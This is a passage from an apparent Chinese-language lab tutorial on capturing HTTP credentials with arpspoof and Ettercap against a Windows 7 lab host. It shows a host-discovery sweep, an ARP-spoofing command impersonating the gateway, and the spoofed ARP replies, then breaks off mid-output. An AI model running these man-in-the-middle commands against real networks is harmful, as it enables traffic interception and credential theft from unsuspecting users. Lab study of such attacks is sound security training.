实验环境
攻击机: kali IP:192.168.3.144
靶机: win 7 IP:192.168.3.141
Ettercap + arpspoof截取http账号密码
1.使用arpspoof进行断网攻击,并开启端口转发
root@afei:~# fping -gs -r 0 192.168.3.2/24
192.168.3.1 is alive
192.168.3.2 is alive
192.168.3.141 is alive
192.168.3.144 is alive
ICMP Host Unreachable from 192.168.3.144 for ICMP Echo sent to 192.168.3.3
ICMP Host Unreachable from 192.168.3.144 for ICMP Echo sent to 192.168.3.6
root@afei:~# arpspoof -i eth0 -t 192.168.3.141 192.168.3.2
...
0:c:29:fa:a7:99 0:c:29:3c:60:ad 0806 42: arp reply 192.168.3.2 is-at 0:c:29:fa:a7:99
0:c:29:fa:a7:99 0:c:29:3c:60:ad 0806 42: arp reply 192.168.3.2 is-at 0:c